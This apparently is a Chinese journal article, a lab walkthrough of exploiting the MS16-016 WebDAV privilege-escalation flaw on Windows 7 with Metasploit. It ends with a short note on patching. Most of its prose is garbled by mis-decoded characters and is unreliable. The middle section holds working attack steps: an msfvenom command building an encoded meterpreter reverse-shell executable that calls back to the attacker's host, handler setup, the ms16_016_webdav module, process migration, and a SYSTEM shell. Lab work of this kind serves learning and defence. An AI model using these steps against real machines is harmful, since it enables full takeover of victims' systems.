»ùÓÚMetasploitµÄMS16-016±¾µØÒç³ö©¶´ÀûÓÃʵս ÏÂÔØ±¾ÎÄ

ÁúÔ´ÆÚ¿¯Íø http://www.qikan.com.cn

»ùÓÚMetasploitµÄMS16-016±¾µØÒç³ö©¶´ÀûÓÃʵս

×÷ÕߣºÕÔÇï

À´Ô´£º¡¶µçÄÔ֪ʶÓë¼¼Êõ¡·2018ÄêµÚ31ÆÚ

ÕªÒª£º ¸ÃÎĶÔMS16-016±¾µØÒç³ö©¶´×öÁ˼òµ¥½éÉÜ£¬ÎÄÖзÖÎöÁËÀûÓÃMS16-016±¾µØÒç³ö©¶´£¬ÉøÍ¸µ½Windows 7Öв¢»ñȡϵͳȨÏÞµÄʵÏÖ·½Ê½£¬×îºó¸ø³öÁ˶ÔÓ¦µÄ·À·¶´ëÊ©¡£ ¹Ø¼ü´Ê£º Metasploit;MS16-016;±¾µØÒç³ö©¶´

ÖÐͼ·ÖÀàºÅ£ºTP393; ; ; ÎÄÏ×±êʶÂ룺A; ; ; ÎÄÕ±àºÅ£º1009-3044£¨2018£©31-0216-01 1 ©¶´½éÉÜ

MS16-016Õâ¸ö©¶´ÊÇÓÉÓÚWindowsÖеÄWebDAVδÕýÈ·´¦ÀíWebDAV¿Í»§¶Ë·¢Ë͵ÄÐÅÏ¢µ¼Öµġ£ÈôÒªÀûÓôË©¶´£¬¹¥»÷ÕßÊ×ÏȱØÐëµÇ¼ϵͳ¡£È»ºó£¬¹¥»÷Õß¿ÉÒÔÔËÐÐÒ»¸öΪÀûÓôË©¶´¶ø¾­ÌØÊâÉè¼ÆµÄÓ¦ÓóÌÐò£¬´Ó¶ø¿ØÖÆÊÜÓ°ÏìµÄϵͳ¡£´Ë©¶´´æÔÚÓÚÔÚ£ºWindows Vista SP2¡¢Windows Server 2008 x86 & x64¡¢Windows Server 2008 R2 x64¡¢Windows 7 x86 & x64¡¢Windows 8.1 x86 & x64¡£ÏµÍ³ÖÐÌáÉýȨÏÞÖÁϵͳȨÏÞ£¬ÒÔÏÂϵͳÖе¼ÖÂϵͳ¾Ü¾ø·þÎñ£¨À¶ÆÁ£©£ºWindows Server 2012¡¢Windows Server 2012 R2¡¢Windows RT 8.1¡¢Windows 10¡£ 2 MS16-016±¾µØÒç³ö©¶´ÀûÓõÄʵÏÖ

ÏÂÃæ½éÉÜÔÚKaliÖÐÉøÍ¸Windows 7 x86µÄʵÏÖ¡£KaliµÄIPµØÖ·Îª10.3.81.106£¬Windows 7 x86µÄIPµØÖ·Îª10.3.81.152£¬Ê¹ÓÃÐéÄâ»úkali ÖеÄMetasploitÀûÓÃMS16-016±¾µØÒç³ö©¶´¶ÔWindows 7µÄ½øÐÐÉøÍ¸£¬´Ó¶ø»ñµÃϵͳȨÏÞ¡£

1£© ÔÚKaliÉÏÉú³ÉÁ¬½ÓÈí¼þmsf.exe£¬LHOSTΪKaliµÄIPµØÖ·

root@kali£º¡«# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '£Üx00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe 2£©ÔÚÃüÁîÐÐÏÂÊäÈë¡°msfconsole¡±£¬½øÈëMSFµÄÆô¶¯½çÃæ root@kali£º¡«# msfconsole

3£©ÔÚMetasploitÃüÁîÌáʾ·ûÏ£¬Ê¹ÓÃuseÃüÁîÔØÈë¼àÌýÄ£¿é¡£ÉèÖÃpayloadΪwindows/meterpreter/reverse_tcp¡£ÉèÖñ¾µØ¼àÌýÖ÷»úIPµØÖ·ÎªKaliµÄIP¡£¿ÉÒÔʹÓÃshow options²é¿´Ïà¹Ø²ÎÊý£¬ÊäÈëexploitÃüÁʼ¼àÌý¡£

ÁúÔ´ÆÚ¿¯Íø http://www.qikan.com.cn

4£©½«Èí¼þmsf.exe·¢¸øWindows 7ÉÏÔËÐУ¬´ËʱkaliÉÏ»áÓÐÁ¬½ÓÌáʾ£¬¿ÉÒÔ¿´¼ûMSFµ¯»ØÁËÒ»¸ösession 1£¨»á»°Á¬½Ó£©¡£½Ó×Å£¬ÔÚMeterpreter ShellÖÐÀûÓÃgetuidÃüÁî²é¿´ÒÑ»ñµÃµÄȨÏÞΪuserȨÏÞ¡£ÎÒÃÇÒª°ÑËüÌáÉýµ½systemȨÏÞ£¬¼´Windows×î¸ßȨÏÞ¡£

5£©ÊäÈëÃüÁîbackground£¬°Ñµ±Ç°µÄmetasploit shellתΪºǫִ́ÐС£Ñ¡ÔñMS16-016Õâ¸ö©¶´ÔÚ½øÐÐÌáȨ£¬Í¬Ê±ÉèÖøղÅÁ¬½ÓµÄIDΪ1¡£×îºó£¬Ö´ÐÐexploitÃüÁî½øÐÐÌáȨ£¬¿ÉÒÔ¿´µ½³É¹¦µÄ°Ñ©¶´ÀûÓõ½ÁËPIDΪ2872µÄ½ø³ÌÖС£

6£©ËäÈ»ÌáȨ³É¹¦ÁË£¬µ«Á¬½Óµ½µÄIDΪ1µÄ»á»°Á¬½ÓÖУ¬Ö´ÐÐgetuidÃüÁÊÇ¿´¼ûµÄÊÇuserȨÏÞ¡£

msf exploit£¨windows/local/ms16_016_webdav£© > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid

Server username£º cmx-PC£Ücmx

7£©Ê¹ÓÃmigrate ÃüÁî£¬Ç¨ÒÆµ½¸Ã½ø³ÌIDÖС£ meterpreter > migrate 2872 [*] Migrating from 4068 to 2872... [*] Migration completed successfully.

8£©È»ºóÖ´ÐÐgetuidÃüÁîÔٴβ鿴ȨÏÞ£¬¿ÉÒÔ¿´µ½ÒѾ­ÊÇϵͳȨÏÞÁË£¬ÊäÈëshell²âÊÔ¡£ meterpreter > getuid

Server username£º NT AUTHORITY£ÜSYSTEM meterpreter > shell Process 608 created. Channel 1 created.

Microsoft Windows [°æ±¾ 6.1.7601]

°æÈ¨ËùÓÐ £¨c£© 2009 Microsoft Corporation¡£±£ÁôËùÓÐȨÀû¡£

ÁúÔ´ÆÚ¿¯Íø http://www.qikan.com.cn

C£º£ÜUsers£Ücmx£ÜDesktop> 3 MS16-016±¾µØÒç³ö©¶´µÄ·ÀÓù

ÄãÒ²¿ÉÒÔͨ¹ý Windows ¸üлñÈ¡´Ë¸üгÌÐò¡£ÔÚÄ㿪Æô×Ô¶¯¸üкó£¬ÏµÍ³»á×Ô¶¯ÏÂÔØ²¢°²×°´Ë¸üгÌÐò¡£https£º//docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016Óû§¿É´Ó´Ë»ñÈ¡¶ÀÁ¢µÄ¸üгÌÐò°ü¡£´Ë°²È«¸üгÌÐòͨ¹ý¸üÕýWebDAVÑéÖ¤ÊäÈëµÄ·½Ê½À´ÐÞ¸´Õâ¸ö©¶´¡£ ²Î¿¼ÎÄÏ×£º

[1] ×£Áһͣ¬ÕÅ×Ó½£.ÍøÂç¹¥·ÀʵսÑо¿Â©¶´ÀûÓÃÓëÌáȨ[M].±±¾©£ºµç×Ó¹¤Òµ³ö°æÉ磬2018. [2][Ó¢]Nipun Jaswal£¬À·å.¾«Í¨MetasploitÉøÍ¸²âÊÔ[M]. 2°æ.±±¾©£ºÈËÃñÓʵç³ö°æÉ磬2017.

[3] http£º//www.freebuf.com/vuls/95950.html.